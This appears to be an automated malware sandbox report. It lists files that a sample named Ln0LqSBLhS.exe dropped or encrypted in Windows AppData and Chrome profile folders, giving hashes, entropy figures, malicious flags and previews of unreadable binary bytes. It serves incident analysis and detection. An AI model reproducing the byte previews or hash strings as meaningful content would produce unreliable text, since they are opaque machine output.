                                                                                                                                                                                                    SHA-512:4ACAD8426AADBA6850B0C18F74BD1DAD40796037566C3D855D547B77C630537525D44BBF9B0A87209392130E34A999D0827A693095896ADA41748EE43F016372
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: }.d.........A.~.S3T....FUD.1O...L.l.q:Nc...Giu..p.4).0.E.9X>..+..^.1......uQ..e..,....~y...xO.1G..'M.!.&e.DX=.F...U{...\f.R..j p......C..$H..gL+./..Mq..(W.u.m. .|..KJ.......%....*..>.e....k........../M(..4....C....b.;.s..O5.X....+..Hd./.....]..H....l....J.=.".4......o.ro..B....Y-...s...3.Y.3......y..........`W~K....|KG.?e..j.s...`.%.Ap.R..U....K.b......g.B.../.i...9h....n.t-.zV...;z.5...pU..8..f....Y..q.+..#..".*...........l.D.......v.n..E......me............Ip\..fN..(.a........F.8g(..9T........oAa...)....f.../....-.v.s..&<..p..HAc.a.6{....g\..r.M......Y...:.O.&7...G = .@d.hv.....MF.O.45...Ve..m.3...HWN....9T.w /..U.`.."..)@S.r..?[.....Y...~..x9#....F.1....,.n*...7.2.....V..p..do.........2zx..`.?,.0.<.'...._.`+........-...w......frO7........YPzdI.N.e....#Y...}>g..[.D..m....$......]...w/.-E..B...3q..5..,.<....L...)7..>.Z.G9F....s.Nc4. .....f......3E.9P*W....3.F5...O.<.L..I?..5..6.e..b.q.u.>..<]...i..rB f5-+.v..0.....}.S..W5h...X~
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998814699114246
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:MtOReHfuBM05Jw8wzH7Lpe5wQuiB7abot0vyes:M84fuewJaH7LpawS7z
                                                                                                                                                                                                    MD5:06BD651174ED4D90709DA6B3D2D9FFA1
                                                                                                                                                                                                    SHA1:970014FB0D5D3CE793EB51553B0714FB9F0B71E0
                                                                                                                                                                                                    SHA-256:831BC3266A5F1CE846986BA2E7E4721485B2BDD6DED2E0C1DB48C73D09F9EC36
                                                                                                                                                                                                    SHA-512:FD796878413A205C5138BFB5CEA5392A422F075559B61215FC4B864CBC2D59F0A06B6FC6707E530D7E0D0B0528517E2C35CF63C5A028FA8017DB14B9BBC7203E
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .u.i.......;...TJ+*f.28N.......F....(.k..W*L..y..._...A..z.|A...1.ReF%'.Gt.9Nq2.|.........+0#....A...y......<.Ld....O...?_..>.u>.Nq..........M.R..........6...P.Z)..u.\..6W.]K...p..=@uV.QS.j|c..3....w.66ms...c....@.....N.x.-.<5...$.")T...e.d>..5P..d.....C.....dr}C*z..........~;.v.OI.<P......][e....B..Gn2..N..3..(ZU.^F..Y......A..Q....{EM.!.........h.".R<JNH.7=Lq......t.>....7..m......K,%V@.U.].>y!.`....a.D........;s.K..O..3....M.....M.^.....+../....O.z..1g.....c.....j.|.a..5..g.Ezf/.rt.xb......4."..Y.g...e..16..d<..9=.x..w?.8/...'....|.n..}...n...A\..._.....C.6<...X...... .H.{G[.b.%{9............[cj...7...Y.H ....9[.....<<.[.......p.k. 4:.wx...^;......O....n.E...=.5..%.bSY.eC.`N.v..;mMF...D.V..]..S.....+.p..~..F...u.S....sb0@kH.'..a-..._"R.R.$_.9&..... ...(".F..^CY$&..~...N.Tn..r.:'....'..>w;.]..... ]..B..r.#f.>.{..........._....f:...x..g+(.........-..~7K.._i.5...N.2...59...&...!3!.../.IgcO.}..)\...=N._...?..9..L..d|.h.....J..a..ZW^Y:.P.7...T..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:PGP\011Secret Key -
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16713
                                                                                                                                                                                                    Entropy (8bit):7.9880896814949915
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:+uYLDUa/0ZHlFOYL6MxOenJfhjkWJ0oNMUV6/+kWwI3p33gAuw6b:2U5NOYLxIenJp/uoND6WY23QADi
                                                                                                                                                                                                    MD5:8660970EFF4571F0603B0E173E07B5C9
                                                                                                                                                                                                    SHA1:6D45823FEE4E74D9FB07C54479E699C44472FA99
                                                                                                                                                                                                    SHA-256:9F3B380482B4CFDE4F618D7A10B4478837CF14E01D85C4B89A90BD91DD401789
                                                                                                                                                                                                    SHA-512:236A5F95D900B52554AE9933EE4B6564B3760A0FFA348209D80B6DD22025838BC37F57C7AA4CC61BACFDD54C095CFCBD78BF1A60EA0A4132B8F91420E02C4648
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .Hx.h.WoNK..~yN._..Nz..Z.f>.%.U,.4............z..I.q.....+r2.E."...M.7DFb...{.o..I..y.9..`.MH....S..abA.a.J2.z...B7H.7...s|..c'......;...nnkIe.}.....@;.4.O!.(..bb.|....E...0.a.o...C':.......~...M..@uj:UDg+..3M.......g|.n......-... f..Q.&. +].T4.1.N.;;.|yI).^..Bi1...?...e.8..J...<..a..@8..w...~Z.....#D;,...I...j.9..... Yb......9.U.!.}v.uy..V.0y....H.(..@.....v.)..pm.".D;H..k.=.O...8...).....4..8..y.)$f.g...l.rZ..z..R....s..p..^c..z.o...R.Vwi..WG.........v......CG..I@G...../o<m.v_...8..../.a..2.]N.......:~..<..=T.E`.......G#...?.}.)....f,...+.a.Cv. .?..u........u..........#.00..C.`.....-.........r...yp_.....O.;.gXO&....ri0O.......@W..cZ...W..9.......=^.....R.9..l...Q....V.+..li..""......0.S. .>c.@...F.I.(... iB.......$+k......K]..."u?.s... ....O..8~b..5.,......70\.u@.e.]..w.M...5I.....m..d...4.&....C..y)V.".!.Sc..m....l?...c..1.?+.=G..].X..i......:H.7?n.........`...7.r..h..lX.N.D.SH...1....@........M..x.F ....%..q......O...>v..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.999067324215175
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:2BtxyW3UTMPIgFzX4EViqlulICJgGvzt9GWQo3NfGqIZMn3GP:WyTMPDEEViziCJDRj+LV
                                                                                                                                                                                                    MD5:C40CA0F2F425B8FBE905A183E624FFDF
                                                                                                                                                                                                    SHA1:6CF3CB50FA8550DE8D82ED756B3B7201AEC35300
                                                                                                                                                                                                    SHA-256:13CDCBBEC772786D16A836AABE436712D94AFE29F85535F7D6E40B9F1794FB25
                                                                                                                                                                                                    SHA-512:60924DA7571434D5C9AF1C5BD5961994BCB5E16D9D03BED01C11CB13978BACC5F33B15576999FE19D8CCF9E077D987D3DA85F011BDC6820ED68F1AB9554F1A19
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....2.U.}.......0.jf..Ut.;.......v...,o...G.,..j.s.oC.F.\....96..l..O..V.......W.......`G.8.Q...'.+!g...WQcY.0 tS.TNlLg.G..}.....q./,.l...Q..H.D.gF.h=...k.hI[...(.U..41....=y.OeK.M...\....#2&E.Z7..3]..gH.....=J.../c......i(U.,T..C/..:.<.1......p2..W<P..k..x!.!...-zq1..-.]....L..........Ci'.4.H.ls.!?R..A.y.:Q.UJu..w.0...,D...w."...Z./.K*....&3N..,LsC=. $lw......._.R....r......h.ik..{0......I.T.E...ov{(........LS...S.6..S.m...~:.....t(.B.......n.rG...".=.9....F.....q..R@.'.k.R.$.B..J...N.f..O&.fm...e./.<.....t..zo.....w.....r\.....0.....4......).(.0....(-....).M^A...o97...P...Q.Z..@D;..zK.....Q.(..l._.C3..VC....d.U.d..Wdn.G....l.!.Z^...I.E`B.%....L.%.rsH.....L.E..q..<....'.1.....*m.O,.X.....U;A...%.q}BC...=lA.K....a..tr........."..%Da....y......v.&P,c&..x...o..>.G.7...(.M:.C+.hV...r..2.....q2.l.QO.@p.8.7..f..$..Q,.....8..S.0.i..CV@V......$.u.O.3U..R..%.....Q..U4G...._ ..p.......Z.Z<.t+{.f..]!._&cH;.......e~..D.{..Wqg...;.R}.F..A:T..h;/.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2318
                                                                                                                                                                                                    Entropy (8bit):7.919312851663093
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:Exr0dJV6Uss1VZ4w5hghAaHG0n0HRtaZLOphJN6kxD:EV0dJV6Uss1/4wkhAaHzoRsZE4k5
                                                                                                                                                                                                    MD5:2622682A7FD5D6365ED3A9E849D25114
                                                                                                                                                                                                    SHA1:F04E66A5D702ED6FE1734B163FE65D91114A6802
                                                                                                                                                                                                    SHA-256:6A58D0EA75DE875F2EC1AB08B5DE488DCCEB5C311C130B80B776E49F6B02F128
                                                                                                                                                                                                    SHA-512:3FB436FE0AA385F0471ED07ED833078F8445199CBA6712AD05FFCB0E2BB96D5ADD54A6592DB5DFCC80251614F7902707DE0EB6E1B4150B8EC33C2C93186648F1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 4..p..A.*.U..W...0."k.g$......9f.U.5R1.:.i. N......Df&(....<...PS.{........W.y.q..ft..u.....Z.1.w...!#o(I*..u..\...../E..$.....0...e.~0i..:.."..z.N\.....&...s.....sU(B.cC..F.,.U..7../x.$..&*..w....i.(.....Q.L......y....;...DB.[l........4.Z..4.E..T....%.Z........0+.,..s.....|.....-}l(H|,G...5f...C.,....</|T\....}.!.ED.7w.V ?....#L. .u...mA...f....VJ%....2..sih...BT..... h.....B...WZ<.m..M....!...X....`.w...a0.@....P6/.J..s.S..U.........{...F.fq.DO3.Z.A.e...8X....SB..-p..{..->r..zhY...%".c..E....+YW.QL..../.p@$.F.y....LL.[.`.@Og..>W.S..xq.r,.:....Wv._.?.'.,...RC.6yuU...D....T...v.x..-.%0.%.ND3..V.8...G......N..](O......2C.v+sr..:.Yg+.=...dJ`.@eGC....V.~.}.P........~..f=.......O....m...u..e.m..b..C.Gp.54.%.Y.2...!"......=q...P......... .!..a..y...!..W...tO6.z..7n..T..P.Z6.....Xk1Z.].(.@..RgR.qmm..c.t~`.|/..>.I.X.......x1.z[........[..dU.'..)0..".N.3.p.}g..R...k.."!.f..`R.P..VZ.t.z....S..+..s.U..y..XS........+.......cV.4..F.5.?]j...]..H.!sw>..'..9.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65881
                                                                                                                                                                                                    Entropy (8bit):7.997334182526539
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:YvjfJt91HHOESqQ8+jWh4EwktBBQjZZeRmVXKG2AeO+x6+BQFqxZMzsVd1fT/:Kt99HOPqEjWGRQaZZeU2XOw/Qm6IVd17
                                                                                                                                                                                                    MD5:D31B7ACE28DA3912F24B0078E2BCF7C2
                                                                                                                                                                                                    SHA1:EAEA50ADBE7DFF4A99442585E1A656EC6796CC7A
                                                                                                                                                                                                    SHA-256:7197C2CDB288486AF8EF2047334E7CFF59152791F9BF7289AE22C067591208FC
                                                                                                                                                                                                    SHA-512:5511BD5E909E91FEB5078E52C929DEBC2C95587C6F1CDD16ED85F2CF27203E8CE241083CC4B657BA158DEFF1AA9F3EBB1B5E821B746B592C9CC9346CA2F47B8F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .7...7q.]e)f..D...\$.^!.U3..j...`...z...R5^9....pn.........Iw.ET.c.....|..D...8.....r...lk..\.|4L%.0.w5[cO.d..."...z=.5..!.O.....C6N.0Q.gF..s.wI....;..;]{..J......qM.lS`...K...6P.%=..7.-/....wRq.....P[.gy........C..e..7p;.._......i.C.wC..Pi.b...i....kT0[...m.T..ZE..)c...F.......`..cs..F...^..?.U"....3P...#.....r..V..1.1F..T_>AR,G.;IJi..O.YoS$..E.,!..c..Rj..M.,h...K5....@jH...).-...D..`.^.S`...<i...6ja;....DMQk..E...W.P2(*..%w. m.K:....O.0m&.QVW.....]$1..C...lr...o...."..4..-.e1T...$.q.i.T....$..b-.....%.}...{b?E.....g...9;_p<...|?.<....{......[...9l.c.q. 4.F....:..U..=...F.I..H..}.3...iY<........B.b2....q?......v.....T.S...2...a....}.ib....;.{.lOb=.(.....2a[.|.Xt....o......x.@..].A |...l..B.v|L....M...z.k...M.(!Z....b....*..b..8.u.$`..}E..TL.K.0.8..C.Y....a...UN....2......'.1..5l.........s.!.....d.j.......O..........G.7o.#A8J<.Z..\.1ja.9.hL.....D.WF..-^)s.R.....y.J.........:..B.~..1...h7.l.......'.d}..GU..#._..REl8..];.....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:COM executable for DOS
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3289
                                                                                                                                                                                                    Entropy (8bit):7.944326550366996
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:Flft7br1KPQuumDVLTGkFb/vIwR44XAmdy4nPXBac/MQwjVD9Ra0AOtZ3RyCfzIm:F3UY5mDBTGcbpxrd3LjwjDE/j2g1TPyH
                                                                                                                                                                                                    MD5:8D3BBBD8D389A9E9DCD7846F7B7178FC
                                                                                                                                                                                                    SHA1:FD51184CEB849723A658C2B03FF2E50AA1B5842C
                                                                                                                                                                                                    SHA-256:D65BCF60DFF9BE03AADFF80CE4E77E4717421AF1D90C518A2F74A06FD3F23B51
                                                                                                                                                                                                    SHA-512:B6350A71FD82317B0964DA2DFF6F02B41D6BE19281F71C25B6DD171AB264358EC22B1E6A950EC705C2226DAFFD69192DAE4B40ECC967E34A0E39F53B963921DF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .Q~.+.1....3.z6.....{*.6.L'..(jka...7U.....i.z....dC.0.C.b..W....r.~.f....<ye...%...y...U. B.@......\.?y#)..[ TQ..u*..x&....xe.CQ...."..5S_......B...d..L..r...._.l.`...B.1.m...[....<t.i[,5%JN..7...W.U.).&.w..c.<....."...v<!......)u&.^..>Jc..S;../.`..s"....5.d!.u.y..R.^..`1........w../kl.,..9n....6G.....m..ydE.1.]..DQ0R-....c.Nc6..O8...WT*......8..}w..R..YWC....qI...%.O .h._....T9E.3..iK..'...7....B.&T_.."v8...j.`..BT..M.....T\.OU........DZ.$..8...m.Xt.J..8.%.....%:....~....R;2..vkW...*.....u....0.bi...Aib..!V!..Xsm.E.}...2.......h-..p.. a.......Y....E..fw.B....+L}FN.!8.B..gy.h..,..bp8.c...O..T.T.p..4....w$.`.:l.H.......[.n..C....F.J......_$nk.Ra0....wOC5].W.......T..gT....(...>.^.F.C...8W...p..n.."X..1.h.....`.I.,..@.. v...yY.c..H....f..]..S...R.7.%C.....WOy{.@.%C.Q..xoMy.K..y...("'..tox.z.....].FkD...'.3...>.#..$.....h.4e......X8.P..n..KT.}..h...4...sb\i.rs...e.TKC.;....DFI.'..5....o$<..../..... v.~...o..?f...s........(.>..B.b.,.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-5F749CFD-12B4.pma
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.99878462797567
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:y9eyUXtB7sPac/eYrtGgRqR0kEcPAcaQoJDSIGfAODqMlFi70:qokyc/eYLRqR3PdmkIdODLlA70
                                                                                                                                                                                                    MD5:4EF6F7B575D4082032CAB4EDD625A041
                                                                                                                                                                                                    SHA1:DD1C108ABC22BC936B255F6A5D2B4C73673A2195
                                                                                                                                                                                                    SHA-256:9C38C609A801351A10524A65347F41E50B8326A67C2E387BAF0C23231F7E38C1
                                                                                                                                                                                                    SHA-512:1FEF9C452AB80F44A4306D949EEF0A96EED0F8DB84A6D07D947804484567918BD410AB28E37638EF69F99DD39AE9B8D4C7E727F7520992B507761526D02FFCC2
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......mp...i.}/...d.H.=z.P....c&...Ao0U.uo<..X.rm.5......FV.z.$.^`.....eU94..#<..'...y.c.C.....M.0......2...o:.......E...|D.....Y.A.>.{h.!.l.W......w.|.T.a.............A.|....L.OD.......`..S.p..&#....o;..uJK...U..._......k..z...~....e"t.....L...8..}...D.m.?.Uv....OS..8i}.Bd.P..it....AA.....f.....`..^..?..8.H....Z..G.s....G......:Tw.q.............S..S.YRyJ.+..5..../M...v.I......g..r=.....G9.fu.8.i..l...Ur.'..k@.G..@P..;.S..a...L.....ms.s.g....+*.......).*.........L8;NA..058oX.f2B|-...v...N.....!..*|.#.....F..7.......K.{d..3&.f.".F.j).r..Cy...?1.sR.2.d....M~}.PO".Z.9C.K.k[.Q.....ga2..:.c.....1.".Hg.i.<.1$>~..@...#.d..V.......~0..a'x|..7.y|.M g.a6\...$te..z.Ai..`.B....U8,.V...a.F(..S.S...O.A...U.Dx.V8...0<ri...qZ...$yN`.&.,wo.V..^.......c.%...{.r.z..:....#..>i....O...9.Sy.5.Bf....*.$..!b....c..=.V~.......[A.2..5......FL)p. b.t.;....Uce^...H...o..+."...i.....].$.o.....D.RrN...L.Ry..]...T2.u....n....~...z..T...=8...0...........H.Gtt./.cz..M.....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-5F749DC8-E1C.pma
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998772649695497
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:qUbsxlJsgnWNLXaK09y7hJ84mZvwwL8rJKKllVJ5l7uogMOEBPYXr:9glJZWNWK+CdmdnIoalr3uo9hmr
                                                                                                                                                                                                    MD5:6AF16C26C98C5F1ED44760C0AF1F8695
                                                                                                                                                                                                    SHA1:7F655CC366548FD2DFEAD4A487ECBDD9CE01C093
                                                                                                                                                                                                    SHA-256:D22DCFADB3DC4250C3F8CDA24237393FF2F511C72C76444004D8E0A2A4738A26
                                                                                                                                                                                                    SHA-512:4BB154CA128BD5D491AEB6BA4BD5927026559AD15A880C3FA73D211911634D5AF6B04703C5D403A3215E2E7480671AFEA34FB82962A211F817EF2F0F46DF325B
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....C.,..2r...C...:r.q..gG...o#..Y..^,p....@......Y..}I...}9)...t.''...!.q.WBb-......`<.*...C....5......wnh:.<pdpt...h.X{..N.tMt.c.YfM..(.Q.. ..>..)..@.p.L&cZm.o"?...O...s..&s...u..W.N..,H.w....C...GGt.?...x.].......5.@..:.W9...A..pMQ#g....#.....'b.....|...ndXB.....C.7a.N.,zs.O..3..M........rn.1}....u.,.l..@}....7..m4_.....o..j.s....9n ..9.8...pk........v..`q.....DA...}&......kD,)/`..'o+..1..o.y.$1@.. .kbc.5.. ..7.N.RK.....&..B..B.....M......C.....b.3.W?..`\...n...;....(-@...#-"...u....X...*S.ik...]./.>..../....t......Aj..l.q...*.m..qW....Kn..y.K..#l..[r/.d..kqn...X)......`.!..w.+...n.}.u.<....#.d.A..t.....w.$5[A.b.C.0.n...w.{/.$..f......-.l.*.1f...'V....C<q.R.C...9~..,#.v,K...}...`......fgCP...c.)..*..v....N.#^..SoG8.$..RO..8.W...@:.L....yg....9(G.<X^.....J&.R.Z.\.`..ED.).....I....BN..i2.o-. 5...=..V.bZt.c..g...D......Z.uI.#.s..D......5...33........Y.-.....H.M.....P...w...M.^...*&..(..i...~....%.'.VLpE{......r1#N....d|.$>9u"n@
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998717313282192
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:iEHaLV4cJgjvEqTNOIWyg8j7bdvjSxqT1tpPiJnV:h6mc2jJTXbBSgptZYV
                                                                                                                                                                                                    MD5:DE74A9C756E681A928378A92F9502AA3
                                                                                                                                                                                                    SHA1:51AC285A7BD2AE3759F7A98E8D61739915EB7B9C
                                                                                                                                                                                                    SHA-256:D8BE52C38C50E40A702000286FC398895028F2D853D5B4F49D93D405DB055D94
                                                                                                                                                                                                    SHA-512:2483C6A7BB0483C55C1E31B9C4E0DC0BB969D3BB024B303CB4047BBF8024A97C5FFA4418561E400649802760805BB74C32531B6ED2F1709FD1E7C1ECB66B6C62
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....U.,F..g..T..Z.....pY..2..L5.BNY....(x^S..O..ja.M..u<..I......\..~k.)..#..&.. .c.7.)6e..[@.q.&&....l.S....3._...5.a...Z.~.Y.7.~....{..fX..7...R......5.Kn.e..........F.....@..:..E..%./WK..<..n.......K..AX.o..)a.....C.*iC@." . ......'bF=m.a.......c..3...m*....B..y...1j.......&P9.p.Z....(...SHT/.<.49.U.."..'........O.I{Q...7...bZeJNcVTnG.P.8..S.@.......&....%b.&.......z\.?...aP>.`Voe..Y.N...L.GxA.R.Q.&..Q...]..xT.aT.y....;o.vl*...S..A..l..V/.0...C..u`...v.jY.Q...g...*.......w.{.s..c.L..p.cW...=..3... ....]....s..[~1...l...}.-;.ml. .$M..>C...HX..e...o..9.J.i0J.......cr..j......L..1.er|..@T...g......:.4...1..tAA..$....Q.r..;F....Q.A.}<0.:n.y..I..X2.......4...b.r..^.....V.^..|.W.h.m..v...-d.g...p...%.L.~..>....3.....9_...W}...E3...3Nt.VL.r^$?a......u.V.vY@..Qj...w.7...&...m"S........\.tD.O.....W|tq..9...........;...n...rai$.]n..=.h....&..R.0.;..I`k...Spf$o.A.......'...w..._.....+.Q....'.rn......Sx.0P".M}u...:.;.........._.%]...^.....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998769903474529
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:ek4gT4dgZB0ji8DaaUPBygcwe22j8+y9T6ZcDkqmfWdkQ7SX8DAwW:JtMdg8jiqcBUw/+BcOY7HDI
                                                                                                                                                                                                    MD5:1B9EDBD6BCB80DD0AF060DBA458623B7
                                                                                                                                                                                                    SHA1:BC9DB58B101CF51703E7C85AF0AD32F7AE0A69B5
                                                                                                                                                                                                    SHA-256:2D97FD48FF66A25D2F1CE309A3EB86EBE9101078FB1AE98AA8D44C0EE19E0F1F
                                                                                                                                                                                                    SHA-512:FD5A7C396BF3ADE1DFE01AA6D13DF59AF62025C5AD90FB0FAD57FF21EA3C8C64933BB89E251C9EB3354022E2B0E88332FEBD63100930AEC959F70BF456202890
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...y........2.eIc.'..a....v.q9f.;..lA<..&.&1.}......@M..w'.[gTr.m..X.:.e..S.Pb....^........N..:....g....M....K.-X.%s.xi.&...[.E|.5.&.>v.c..A.C.|.IH..3w.\{..a...m5.....O....c]......Y:.H.>r)....f.W.S.=......d..y..].g..Ei...\.p.9.....S.-..6...4..PM.v..5..9.j=^.8..p.0b...]....Yf.....: ...PRd...Yc..K`w..c*......ask.......u<...#..e.....x."$..... T,L.E....p1.Yd....D.......9..P.*G...-.w}.....K.v...Q....h...M5s.D.......E.T...k...R..C....U...%.5....H...Za..5A.mT...sl1D.i.......E<.;~.9....2k<A..6....JS.@..{..V..q.L.E..[.u./.B.....n...:.....Yj.N...Y.._..4.6c..a...S.:q;...D...:...v1.y.,....6.~".j .8CG......t......_...uI......X......>pj.e.;.|{..zX...g.....V.h.....$.RIC.X..vJ.d..S`......."5n.6W..%..D_H...#5..m\.v`Xy..-i.0./.8..^)K...(y.{..}.B....\.p..]@..w.P"<3..{.s.>=."-...Y.8..I*-.......*;..U.....?c..E....m.....N.......~.................Au.\t.f+.....w.._jXr>....A.a...1S.jO.b.....0.g....n.4.;....M.).9w.D.t.kw.@l....%T%1{ul...y.A%.....G..A
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):369
                                                                                                                                                                                                    Entropy (8bit):7.316399815756833
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:F30e7oxSAQnogfJZCDBgJ2ycJ/4/ey6M+2IrGAN540gWSkLH75dExcii96Z:F3KxSlogxAO94hTj2gpNghcii9a
                                                                                                                                                                                                    MD5:A8899E1FFEC7D3C3BE1A126BADE539DB
                                                                                                                                                                                                    SHA1:828C4B55FF11B83AE844A7B511A0567679D679DD
                                                                                                                                                                                                    SHA-256:AD0872A9DFB8D8F7BB519EB69BC6E927ADB8E7C0176CDF8EBF9BAAA0C0AEF0A8
                                                                                                                                                                                                    SHA-512:EFF02661C89484B15A62C2309162825BB25B3014B5D1E34F8CEFCFAEC239654B0FC0D871A3E2851005490A933DC1D5FD6413D381952A658B7956D3A4AE3CB4CF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: #..w..D".~H...5M.......`...9.c._%..X.W...".8.@\\....z.YP.`.......NA...v...n+..-..zA..L..V.q(C.Z...D6l).I.w.......A.0..2..R..ey......|#.._.Z...7J.T.evd.......N..K..FI.l.....:........o>....?.j.O".-.<.t...\.@g.?../.. ..w'......w..w..L..?..h.E..M6.......=....L...:d.w.(<..k.w.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):500
                                                                                                                                                                                                    Entropy (8bit):7.529289981043872
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:IXYmX5S0YGRtkcd/SO2lBgu3SlFrvtIdUe5rQlHBLMzXcii9a:QPX5Siv/SrnYlFr6Ue5ryhLMjbD
                                                                                                                                                                                                    MD5:5D6721329B9835ED5F40501E44982C7B
                                                                                                                                                                                                    SHA1:868BFBDA57CCBB5B67CEC0E70FE41AA499B61ED5
                                                                                                                                                                                                    SHA-256:B8D5E132A8466E519C3AE0704B3BB091B8115D56FBBBDE3534830765B2F4B0FE
                                                                                                                                                                                                    SHA-512:E8E7C0BCB4BAB4289C203A7DE2569FEB5B0640D9E9B835B924099DFCAE0FA510A5CB24081D676C4805C5D9562BE659D546FE84F5858886435E17AE0DA8117A23
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
